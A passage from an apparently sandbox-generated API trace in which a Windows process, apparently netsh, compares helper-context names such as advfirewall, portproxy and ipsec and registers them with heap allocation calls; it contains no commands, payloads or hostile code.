(_String1="mainmode", _String2="firewall") returned 7 [0315.819] _wcsicmp (_String1="mainmode", _String2="monitor") returned -14 [0315.819] GetProcessHeap () returned 0x2b30000 [0315.819] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x120) returned 0x2b68940 [0315.819] GetProcessHeap () returned 0x2b30000 [0315.819] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b4b038) returned 1 [0315.820] RegisterContext () returned 0x0 [0315.820] _wcsicmp (_String1="dhcpclient", _String2="advfirewall") returned 3 [0315.820] _wcsicmp (_String1="dhcpclient", _String2="interface") returned -5 [0315.820] _wcsicmp (_String1="dhcpclient", _String2="ras") returned -14 [0315.820] _wcsicmp (_String1="dhcpclient", _String2="advfirewall") returned 3 [0315.820] _wcsicmp (_String1="dhcpclient", _String2="interface") returned -5 [0315.820] GetProcessHeap () returned 0x2b30000 [0315.821] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x120) returned 0x2b68a68 [0315.821] GetProcessHeap () returned 0x2b30000 [0315.821] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b47ae8) returned 1 [0315.821] RegisterContext () returned 0x0 [0315.822] _wcsicmp (_String1="lan", _String2="advfirewall") returned 11 [0315.822] _wcsicmp (_String1="lan", _String2="dhcpclient") returned 8 [0315.822] _wcsicmp (_String1="lan", _String2="interface") returned 3 [0315.822] _wcsicmp (_String1="lan", _String2="ras") returned -6 [0315.822] _wcsicmp (_String1="lan", _String2="advfirewall") returned 11 [0315.822] _wcsicmp (_String1="lan", _String2="dhcpclient") returned 8 [0315.822] _wcsicmp (_String1="lan", _String2="interface") returned 3 [0315.822] _wcsicmp (_String1="lan", _String2="ras") returned -6 [0315.822] GetProcessHeap () returned 0x2b30000 [0315.822] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x168) returned 0x2b68b90 [0315.823] GetProcessHeap () returned 0x2b30000 [0315.823] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68a68) returned 1 [0316.022] RegisterContext () returned 0x0 [0316.023] _wcsicmp (_String1="firewall", _String2="advfirewall") returned 5 [0316.023] _wcsicmp (_String1="firewall", _String2="dhcpclient") returned 2 [0316.023] _wcsicmp (_String1="firewall", _String2="interface") returned -3 [0316.023] _wcsicmp (_String1="firewall", _String2="lan") returned -6 [0316.023] _wcsicmp (_String1="firewall", _String2="ras") returned -12 [0316.023] _wcsicmp (_String1="firewall", _String2="advfirewall") returned 5 [0316.023] _wcsicmp (_String1="firewall", _String2="dhcpclient") returned 2 [0316.023] _wcsicmp (_String1="firewall", _String2="interface") returned -3 [0316.023] GetProcessHeap () returned 0x2b30000 [0316.023] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1b0) returned 0x2b68d00 [0316.024] GetProcessHeap () returned 0x2b30000 [0316.024] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68b90) returned 1 [0316.024] RegisterContext () returned 0x0 [0316.024] _wcsicmp (_String1="bridge", _String2="advfirewall") returned 1 [0316.024] _wcsicmp (_String1="bridge", _String2="dhcpclient") returned -2 [0316.024] _wcsicmp (_String1="bridge", _String2="firewall") returned -4 [0316.024] _wcsicmp (_String1="bridge", _String2="interface") returned -7 [0316.025] _wcsicmp (_String1="bridge", _String2="lan") returned -10 [0316.025] _wcsicmp (_String1="bridge", _String2="ras") returned -16 [0316.025] _wcsicmp (_String1="bridge", _String2="advfirewall") returned 1 [0316.025] _wcsicmp (_String1="bridge", _String2="dhcpclient") returned -2 [0316.025] GetProcessHeap () returned 0x2b30000 [0316.025] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1f8) returned 0x2b68a68 [0316.025] GetProcessHeap () returned 0x2b30000 [0316.025] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68d00) returned 1 [0316.026] RegisterContext () returned 0x0 [0316.026] _wcsicmp (_String1="netio", _String2="advfirewall") returned 13 [0316.026] _wcsicmp (_String1="netio", _String2="bridge") returned 12 [0316.026] _wcsicmp (_String1="netio", _String2="dhcpclient") returned 10 [0316.026] _wcsicmp (_String1="netio", _String2="firewall") returned 8 [0316.026] _wcsicmp (_String1="netio", _String2="interface") returned 5 [0316.027] _wcsicmp (_String1="netio", _String2="lan") returned 2 [0316.027] _wcsicmp (_String1="netio", _String2="ras") returned -4 [0316.027] _wcsicmp (_String1="netio", _String2="advfirewall") returned 13 [0316.027] _wcsicmp (_String1="netio", _String2="bridge") returned 12 [0316.027] _wcsicmp (_String1="netio", _String2="dhcpclient") returned 10 [0316.027] _wcsicmp (_String1="netio", _String2="firewall") returned 8 [0316.027] _wcsicmp (_String1="netio", _String2="interface") returned 5 [0316.027] _wcsicmp (_String1="netio", _String2="lan") returned 2 [0316.027] _wcsicmp (_String1="netio", _String2="ras") returned -4 [0316.027] GetProcessHeap () returned 0x2b30000 [0316.027] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x240) returned 0x2b68c68 [0316.028] GetProcessHeap () returned 0x2b30000 [0316.028] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68a68) returned 1 [0316.028] RegisterContext () returned 0x0 [0316.029] _wcsicmp (_String1="dnsclient", _String2="advfirewall") returned 3 [0316.029] _wcsicmp (_String1="dnsclient", _String2="bridge") returned 2 [0316.029] _wcsicmp (_String1="dnsclient", _String2="dhcpclient") returned 6 [0316.029] _wcsicmp (_String1="dnsclient", _String2="firewall") returned -2 [0316.029] _wcsicmp (_String1="dnsclient", _String2="interface") returned -5 [0316.029] _wcsicmp (_String1="dnsclient", _String2="lan") returned -8 [0316.031] _wcsicmp (_String1="dnsclient", _String2="netio") returned -10 [0316.031] _wcsicmp (_String1="dnsclient", _String2="ras") returned -14 [0316.031] _wcsicmp (_String1="dnsclient", _String2="advfirewall") returned 3 [0316.031] _wcsicmp (_String1="dnsclient", _String2="bridge") returned 2 [0316.031] _wcsicmp (_String1="dnsclient", _String2="dhcpclient") returned 6 [0316.031] _wcsicmp (_String1="dnsclient", _String2="firewall") returned -2 [0316.031] GetProcessHeap () returned 0x2b30000 [0316.031] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x288) returned 0x2b614e8 [0316.031] GetProcessHeap () returned 0x2b30000 [0316.031] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68c68) returned 1 [0316.031] RegisterContext () returned 0x0 [0316.032] _wcsicmp (_String1="namespace", _String2="advfirewall") returned 13 [0316.032] _wcsicmp (_String1="namespace", _String2="bridge") returned 12 [0316.032] _wcsicmp (_String1="namespace", _String2="dhcpclient") returned 10 [0316.032] _wcsicmp (_String1="namespace", _String2="dnsclient") returned 10 [0316.032] _wcsicmp (_String1="namespace", _String2="firewall") returned 8 [0316.032] _wcsicmp (_String1="namespace", _String2="interface") returned 5 [0316.032] _wcsicmp (_String1="namespace", _String2="lan") returned 2 [0316.032] _wcsicmp (_String1="namespace", _String2="netio") returned -4 [0316.032] _wcsicmp (_String1="namespace", _String2="ras") returned -4 [0316.032] _wcsicmp (_String1="namespace", _String2="advfirewall") returned 13 [0316.032] _wcsicmp (_String1="namespace", _String2="bridge") returned 12 [0316.032] _wcsicmp (_String1="namespace", _String2="dhcpclient") returned 10 [0316.032] _wcsicmp (_String1="namespace", _String2="dnsclient") returned 10 [0316.032] _wcsicmp (_String1="namespace", _String2="firewall") returned 8 [0316.032] _wcsicmp (_String1="namespace", _String2="interface") returned 5 [0316.032] _wcsicmp (_String1="namespace", _String2="lan") returned 2 [0316.032] _wcsicmp (_String1="namespace", _String2="netio") returned -4 [0316.033] GetProcessHeap () returned 0x2b30000 [0316.033] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x2d0) returned 0x2b68a68 [0316.033] GetProcessHeap () returned 0x2b30000 [0316.033] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b614e8) returned 1 [0316.033] RegisterContext () returned 0x0 [0316.033] GetProcessHeap () returned 0x2b30000 [0316.033] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c78 [0316.034] GetProcessHeap () returned 0x2b30000 [0316.034] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0316.034] RegisterContext () returned 0x0 [0316.034] _wcsicmp (_String1="ipv6", _String2="ipv4") returned 2 [0316.034] _wcsicmp (_String1="ipv6", _String2="ipv4") returned 2 [0316.034] GetProcessHeap () returned 0x2b30000 [0316.034] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x90) returned 0x2b64f20 [0316.034] GetProcessHeap () returned 0x2b30000 [0316.034] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b46c78) returned 1 [0316.035] RegisterContext () returned 0x0 [0316.035] _wcsicmp (_String1="6to4", _String2="ipv4") returned -51 [0316.035] _wcsicmp (_String1="6to4", _String2="ipv6") returned -51 [0316.035] _wcsicmp (_String1="6to4", _String2="ipv4") returned -51 [0316.035] GetProcessHeap () returned 0x2b30000 [0316.035] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xd8) returned 0x2b47ae8 [0316.036] GetProcessHeap () returned 0x2b30000 [0316.036] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b64f20) returned 1 [0316.036] RegisterContext () returned 0x0 [0316.036] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0316.036] _wcsicmp (_String1="isatap", _String2="ipv4") returned 3 [0316.036] _wcsicmp (_String1="isatap", _String2="ipv6") returned 3 [0316.036] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0316.036] _wcsicmp (_String1="isatap", _String2="ipv4") returned 3 [0316.036] _wcsicmp (_String1="isatap", _String2="ipv6") returned 3 [0316.036] GetProcessHeap () returned 0x2b30000 [0316.037] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x120) returned 0x2b68d40 [0316.037] GetProcessHeap () returned 0x2b30000 [0316.037] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b47ae8) returned 1 [0316.037] RegisterContext () returned 0x0 [0316.037] _wcsicmp (_String1="teredo", _String2="6to4") returned 62 [0316.037] _wcsicmp (_String1="teredo", _String2="ipv4") returned 11 [0316.037] _wcsicmp (_String1="teredo", _String2="ipv6") returned 11 [0316.037] _wcsicmp (_String1="teredo", _String2="isatap") returned 11 [0316.037] _wcsicmp (_String1="teredo", _String2="6to4") returned 62 [0316.037] _wcsicmp (_String1="teredo", _String2="ipv4") returned 11 [0316.038] _wcsicmp (_String1="teredo", _String2="ipv6") returned 11 [0316.038] _wcsicmp (_String1="teredo", _String2="isatap") returned 11 [0316.038] GetProcessHeap () returned 0x2b30000 [0316.038] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x168) returned 0x2b68e68 [0316.038] GetProcessHeap () returned 0x2b30000 [0316.038] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68d40) returned 1 [0316.039] RegisterContext () returned 0x0 [0316.039] _wcsicmp (_String1="portproxy", _String2="6to4") returned 58 [0316.039] _wcsicmp (_String1="portproxy", _String2="ipv4") returned 7 [0316.039] _wcsicmp (_String1="portproxy", _String2="ipv6") returned 7 [0316.040] _wcsicmp (_String1="portproxy", _String2="isatap") returned 7 [0316.040] _wcsicmp (_String1="portproxy", _String2="teredo") returned -4 [0316.040] _wcsicmp (_String1="portproxy", _String2="6to4") returned 58 [0316.040] _wcsicmp (_String1="portproxy", _String2="ipv4") returned 7 [0316.040] _wcsicmp (_String1="portproxy", _String2="ipv6") returned 7 [0316.040] _wcsicmp (_String1="portproxy", _String2="isatap") returned 7 [0316.040] _wcsicmp (_String1="portproxy", _String2="teredo") returned -4 [0316.040] GetProcessHeap () returned 0x2b30000 [0316.040] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1b0) returned 0x2b614e8 [0316.040] GetProcessHeap () returned 0x2b30000 [0316.041] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68e68) returned 1 [0316.041] RegisterContext () returned 0x0 [0316.041] GetProcessHeap () returned 0x2b30000 [0316.041] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c78 [0316.041] GetProcessHeap () returned 0x2b30000 [0316.041] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0316.041] RegisterContext () returned 0x0 [0316.041] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0316.041] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0316.041] GetProcessHeap () returned 0x2b30000 [0316.041] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x90) returned 0x2b64f20 [0316.042] GetProcessHeap () returned 0x2b30000 [0316.042] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b46c78) returned 1 [0316.042] RegisterContext () returned 0x0 [0316.042] _wcsicmp (_String1="portproxy", _String2="6to4") returned 58 [0316.042] _wcsicmp (_String1="portproxy", _String2="ipv4") returned 7 [0316.042] _wcsicmp (_String1="portproxy", _String2="ipv6") returned 7 [0316.042] _wcsicmp (_String1="portproxy", _String2="isatap") returned 7 [0316.042] _wcsicmp (_String1="portproxy", _String2="portproxy") returned 0 [0316.043] RegisterContext () returned 0x0 [0316.043] _wcsicmp (_String1="httpstunnel", _String2="6to4") returned 50 [0316.043] _wcsicmp (_String1="httpstunnel", _String2="ipv4") returned -1 [0316.043] _wcsicmp (_String1="httpstunnel", _String2="ipv6") returned -1 [0316.043] _wcsicmp (_String1="httpstunnel", _String2="isatap") returned -1 [0316.043] _wcsicmp (_String1="httpstunnel", _String2="portproxy") returned -8 [0316.043] _wcsicmp (_String1="httpstunnel", _String2="teredo") returned -12 [0316.043] _wcsicmp (_String1="httpstunnel", _String2="6to4") returned 50 [0316.043] _wcsicmp (_String1="httpstunnel", _String2="ipv4") returned -1 [0316.043] GetProcessHeap () returned 0x2b30000 [0316.043] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1f8) returned 0x2b68d40 [0316.044] GetProcessHeap () returned 0x2b30000 [0316.044] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b614e8) returned 1 [0316.044] RegisterContext () returned 0x0 [0316.044] _wcsicmp (_String1="tcp", _String2="6to4") returned 62 [0316.044] _wcsicmp (_String1="tcp", _String2="httpstunnel") returned 12 [0316.044] _wcsicmp (_String1="tcp", _String2="ipv4") returned 11 [0316.044] _wcsicmp (_String1="tcp", _String2="ipv6") returned 11 [0316.044] _wcsicmp (_String1="tcp", _String2="isatap") returned 11 [0316.045] _wcsicmp (_String1="tcp", _String2="portproxy") returned 4 [0316.045] _wcsicmp (_String1="tcp", _String2="teredo") returned -2 [0316.045] _wcsicmp (_String1="tcp", _String2="6to4") returned 62 [0316.045] _wcsicmp (_String1="tcp", _String2="httpstunnel") returned 12 [0316.045] _wcsicmp (_String1="tcp", _String2="ipv4") returned 11 [0316.045] _wcsicmp (_String1="tcp", _String2="ipv6") returned 11 [0316.045] _wcsicmp (_String1="tcp", _String2="isatap") returned 11 [0316.045] _wcsicmp (_String1="tcp", _String2="portproxy") returned 4 [0316.045] _wcsicmp (_String1="tcp", _String2="teredo") returned -2 [0316.045] GetProcessHeap () returned 0x2b30000 [0316.046] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x240) returned 0x2b614e8 [0316.046] GetProcessHeap () returned 0x2b30000 [0316.046] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68d40) returned 1 [0316.046] RegisterContext () returned 0x0 [0316.047] _wcsicmp (_String1="http", _String2="advfirewall") returned 7 [0316.047] _wcsicmp (_String1="http", _String2="bridge") returned 6 [0316.047] _wcsicmp (_String1="http", _String2="dhcpclient") returned 4 [0316.047] _wcsicmp (_String1="http", _String2="dnsclient") returned 4 [0316.047] _wcsicmp (_String1="http", _String2="firewall") returned 2 [0316.047] _wcsicmp (_String1="http", _String2="interface") returned -1 [0316.047] _wcsicmp (_String1="http", _String2="lan") returned -4 [0316.047] _wcsicmp (_String1="http", _String2="namespace") returned -6 [0316.047] _wcsicmp (_String1="http", _String2="netio") returned -6 [0316.047] _wcsicmp (_String1="http", _String2="ras") returned -10 [0316.047] _wcsicmp (_String1="http", _String2="advfirewall") returned 7 [0316.047] _wcsicmp (_String1="http", _String2="bridge") returned 6 [0316.047] _wcsicmp (_String1="http", _String2="dhcpclient") returned 4 [0316.047] _wcsicmp (_String1="http", _String2="dnsclient") returned 4 [0316.048] _wcsicmp (_String1="http", _String2="firewall") returned 2 [0316.048] _wcsicmp (_String1="http", _String2="interface") returned -1 [0316.048] GetProcessHeap () returned 0x2b30000 [0316.048] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x318) returned 0x2b61730 [0316.048] GetProcessHeap () returned 0x2b30000 [0316.048] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68a68) returned 1 [0316.050] RegisterContext () returned 0x0 [0316.050] _wcsicmp (_String1="ipsec", _String2="advfirewall") returned 8 [0316.050] _wcsicmp (_String1="ipsec", _String2="bridge") returned 7 [0316.051] _wcsicmp (_String1="ipsec", _String2="dhcpclient") returned 5 [0316.051] _wcsicmp (_String1="ipsec", _String2="dnsclient") returned 5 [0316.051] _wcsicmp (_String1="ipsec", _String2="firewall") returned 3 [0316.051] _wcsicmp (_String1="ipsec", _String2="http") returned 1 [0316.051] _wcsicmp (_String1="ipsec", _String2="interface") returned 2 [0316.051] _wcsicmp (_String1="ipsec", _String2="lan") returned -3 [0316.051] _wcsicmp (_String1="ipsec", _String2="namespace") returned -5 [0316.051] _wcsicmp (_String1="ipsec", _String2="netio") returned -5 [0316.051] _wcsicmp (_String1="ipsec", _String2="ras") returned -9 [0316.051] _wcsicmp (_String1="ipsec", _String2="advfirewall") returned 8 [0316.051] _wcsicmp (_String1="ipsec", _String2="bridge") returned 7 [0316.051] _wcsicmp (_String1="ipsec", _String2="dhcpclient") returned 5 [0316.051] _wcsicmp (_String1="ipsec", _String2="dnsclient") returned 5 [0316.051] _wcsicmp (_String1="ipsec", _String2="firewall") returned 3 [0316.052] _wcsicmp (_String1="ipsec", _String2="http") returned 1 [0316.052] _wcsicmp (_String1="ipsec", _String2="interface") returned 2 [0316.052] _wcsicmp (_String1="ipsec", _String2="lan") returned -3 [0316.052] GetProcessHeap () returned 0x2b30000 [0316.052] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x360) returned 0x2b68a68 [0316.052] GetProcessHeap () returned 0x2b30000 [0316.052] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b61730) returned 1 [0316.052] RegisterContext () returned 0x0 [0316.053] GetProcessHeap () returned 0x2b30000 [0316.053] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c78 [0316.053] GetProcessHeap () returned 0x2b30000 [0316.053] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0316.053] RegisterContext () returned 0x0 [0316.053] _wcsicmp (_String1="dynamic", _String2="static") returned -15 [0316.053] _wcsicmp (_String1="dynamic", _String2="static") returned -15 [0316.053] GetProcessHeap () returned 0x2b30000 [0316.053] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x90) returned 0x2b54eb0 [0316.054] GetProcessHeap () returned 0x2b30000 [0316.054] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b46c78) returned 1 [0316.054] RegisterContext () returned 0x0 [0316.054] _wcsicmp (_String1="static", _String2="dynamic") returned 15 [0316.054] _wcsicmp (_String1="static", _String2="static") returned 0 [0316.054] RegisterContext () returned 0x0 [0316.054] _wcsicmp (_String1="dynamic", _String2="dynamic") returned 0 [0316.055] RegisterContext () returned 0x0 [0316.359] _wcsicmp (_String1="wfp", _String2="advfirewall") returned 22 [0316.359] _wcsicmp (_String1="wfp", _String2="bridge") returned 21 [0316.359] _wcsicmp (_String1="wfp", _String2="dhcpclient") returned 19 [0316.359] _wcsicmp (_String1="wfp", _String2="dnsclient") returned 19 [0316.360] _wcsicmp (_String1="wfp", _String2="firewall") returned 17 [0316.360] _wcsicmp (_String1="wfp", _String2="http") returned 15 [0316.360] _wcsicmp (_String1="wfp", _String2="interface") returned 14 [0316.360] _wcsicmp (_String1="wfp", _String2="ipsec") returned 14 [0316.360] _wcsicmp (_String1="wfp", _String2="lan") returned 11 [0316.360] _wcsicmp (_String1="wfp", _String2="namespace") returned 9 [0316.360] _wcsicmp (_String1="wfp", _String2="netio") returned 9 [0316.360] _wcsicmp (_String1="wfp", _String2="ras") returned 5 [0316.360] _wcsicmp (_String1="wfp", _String2="advfirewall") returned 22 [0316.360] _wcsicmp (_String1="wfp", _String2="bridge") returned 21 [0316.360] _wcsicmp (_String1="wfp", _String2="dhcpclient") returned 19 [0316.360] _wcsicmp (_String1="wfp", _String2="dnsclient") returned 19 [0316.360] _wcsicmp (_String1="wfp", _String2="firewall") returned 17 [0316.361] _wcsicmp (_String1="wfp", _String2="http") returned 15 [0316.361] _wcsicmp (_String1="wfp", _String2="interface") returned 14 [0316.361] _wcsicmp (_String1="wfp", _String2="ipsec") returned 14 [0316.361] _wcsicmp (_String1="wfp", _String2="lan") returned 11 [0316.361] _wcsicmp (_String1="wfp", _String2="namespace") returned 9 [0316.361] _wcsicmp (_String1="wfp", _String2="netio") returned 9 [0316.361] _wcsicmp (_String1="wfp", _String2="ras") returned 5 [0316.361] GetProcessHeap () returned 0x2b30000 [0316.361] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x3a8) returned 0x2b61730 [0316.361] GetProcessHeap () returned 0x2b30000 [0316.361] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b68a68) returned 1 [0316.367] RegisterContext () returned 0x0 [0316.367] _wcsicmp (_String1="p2p", _String2="advfirewall") returned 15 [0316.367] _wcsicmp (_String1="p2p", _String2="bridge") returned 14 [0316.368] _wcsicmp (_String1="p2p", _String2="dhcpclient") returned 12 [0316.368] _wcsicmp (_String1="p2p", _String2="dnsclient") returned 12 [0316.368] _wcsicmp (_String1="p2p", _String2="firewall") returned 10 [0316.368] _wcsicmp (_String1="p2p", _String2="http") returned 8 [0316.368] _wcsicmp (_String1="p2p", _String2="interface") returned 7 [0316.368] _wcsicmp (_String1="p2p", _String2="ipsec") returned 7 [0316.368] _wcsicmp (_String1="p2p", _String2="lan") returned 4 [0316.368] _wcsicmp (_String1="p2p", _String2="namespace") returned 2 [0316.368] _wcsicmp (_String1="p2p", _String2="netio") returned 2 [0316.368] _wcsicmp (_String1="p2p", _String2="ras") returned -2 [0316.368] _wcsicmp (_String1="p2p", _String2="wfp") returned -7 [0316.368] _wcsicmp (_String1="p2p", _String2="advfirewall") returned 15 [0316.368] _wcsicmp (_String1="p2p", _String2="bridge") returned 14 [0316.368] _wcsicmp (_String1="p2p", _String2="dhcpclient") returned 12 [0316.368] _wcsicmp (_String1="p2p", _String2="dnsclient") returned 12 [0316.369] _wcsicmp (_String1="p2p", _String2="firewall") returned 10 [0316.369] _wcsicmp (_String1="p2p", _String2="http") returned 8 [0316.369] _wcsicmp (_String1="p2p", _String2="interface") returned 7 [0316.369] _wcsicmp (_String1="p2p", _String2="ipsec") returned 7 [0316.369] _wcsicmp (_String1="p2p", _String2="lan") returned 4 [0316.369] _wcsicmp (_String1="p2p", _String2="namespace") returned 2 [0316.369] _wcsicmp (_String1="p2p", _String2="netio") returned 2 [0316.369] _wcsicmp (_String1="p2p", _String2="ras") returned -2 [0316.369] GetProcessHeap () returned 0x2b30000 [0316.369] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x3f0) returned 0x2b61ae0 [0316.369] GetProcessHeap () returned 0x2b30000 [0316.369] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b61730) returned 1 [0316.370] RegisterContext () returned 0x0 [0316.370] GetProcessHeap () returned 0x2b30000 [0316.370] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c78 [0316.370] GetProcessHeap () returned 0x2b30000 [0316.370] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0316.380] RegisterContext () returned 0x0 [0316.381] _wcsicmp (_String1="group", _String2="pnrp") returned -9 [0316.381] _wcsicmp (_String1="group", _String2="pnrp") returned -9 [0316.381] GetProcessHeap () returned 0x2b30000 [0316.381] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x90) returned 0x2b59220 [0316.381] GetProcessHeap () returned 0x2b30000 [0316.381] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b46c78) returned 1 [0316.381] RegisterContext () returned 0x0 [0316.382] _wcsicmp (_String1="idmgr", _String2="group") returned 2 [0316.382] _wcsicmp (_String1="idmgr", _String2="pnrp") returned -7 [0316.382] _wcsicmp (_String1="idmgr", _String2="group") returned 2 [0316.382] _wcsicmp (_String1="idmgr", _String2="pnrp") returned -7 [0316.382] GetProcessHeap () returned 0x2b30000 [0316.382] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xd8) returned 0x2b47ae8 [0316.382] GetProcessHeap () returned 0x2b30000 [0316.382] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b59220) returned 1 [0316.382] RegisterContext () returned 0x0 [0316.382] GetProcessHeap () returned 0x2b30000 [0316.383] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c78 [0316.383] GetProcessHeap () returned 0x2b30000 [0316.383] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0316.383] RegisterContext () returned 0x0 [0316.383] _wcsicmp (_String1="diagnostics", _String2="cloud") returned 1 [0316.383] _wcsicmp (_String1="diagnostics", _String2="cloud") returned 1 [0316.383] GetProcessHeap () returned 0x2b30000 [0316.383] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x90) returned 0x2b59220 [0316.383] GetProcessHeap () returned 0x2b30000 [0316.384] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b46c78) returned 1 [0316.384] RegisterContext () returned 0x0 [0316.384] _wcsicmp (_String1="peer", _String2="cloud") returned 13 [0316.384] _wcsicmp (_String1="peer", _String2="diagnostics") returned 12 [0316.384] _wcsicmp (_String1="peer", _String2="cloud") returned 13 [0316.384] _wcsicmp (_String1="peer", _String2="diagnostics") returned 12 [0316.384] GetProcessHeap () returned 0x2b30000 [0316.384] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xd8) returned 0x2b4b038 [0316.384] GetProcessHeap () returned 0x2b30000 [0316.384] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b59220) returned 1 [0316.385] RegisterContext () returned 0x0 [0316.385] GetProcessHeap () returned 0x2b30000 [0316.385] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b46c78 [0316.385] GetProcessHeap () returned 0x2b30000 [0316.385] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0316.386] RegisterContext () returned 0x0 [0316.386] _wcsicmp (_String1="rpc", _String2="advfirewall") returned 17 [0316.386] _wcsicmp (_String1="rpc", _String2="bridge") returned 16 [0316.386] _wcsicmp (_String1="rpc", _String2="dhcpclient") returned 14 [0316.386] _wcsicmp (_String1="rpc", _String2="dnsclient") returned 14 [0316.386] _wcsicmp (_String1="rpc", _String2="firewall") returned 12 [0316.386] _wcsicmp (_String1="rpc", _String2="http") returned 10 [0316.386] _wcsicmp (_String1="rpc", _String2="interface") returned 9 [0316.386] _wcsicmp (_String1="rpc", _String2="ipsec") returned 9 [0316.386] _wcsicmp (_String1="rpc", _String2="lan") returned 6 [0316.386] _wcsicmp (_String1="rpc", _String2="namespace") returned 4 [0316.386] _wcsicmp (_String1="rpc", _String2="netio") returned 4 [0316.386] _wcsicmp (_String1="rpc", _String2="p2p") returned 2 [0316.387] _wcsicmp (_String1="rpc", _String2="ras") returned 15 [0316.387] _wcsicmp (_String1="rpc", _String2="wfp") returned -5 [0316.387] _wcsicmp (_String1="rpc", _String2="advfirewall") returned 17 [0316.387] _wcsicmp (_String1="rpc", _String2="bridge") returned 16 [0316.387] _wcsicmp (_String1="rpc", _String2="dhcpclient") returned 14 [0316.387] _wcsicmp (_String1="rpc", _String2="dnsclient") returned 14 [0316.387] _wcsicmp (_String1="rpc", _String2="firewall") returned 12 [0316.387] _wcsicmp (_String1="rpc", _String2="http") returned 10 [0316.387] _wcsicmp (_String1="rpc", _String2="interface") returned 9 [0316.387] _wcsicmp (_String1="rpc", _String2="ipsec") returned 9 [0316.387] _wcsicmp (_String1="rpc", _String2="lan") returned 6 [0316.387] _wcsicmp (_String1="rpc", _String2="namespace") returned 4 [0316.387] _wcsicmp (_String1="rpc", _String2="netio") returned 4 [0316.387] _wcsicmp (_String1="rpc", _String2="p2p") returned 2 [0316.388] _wcsicmp 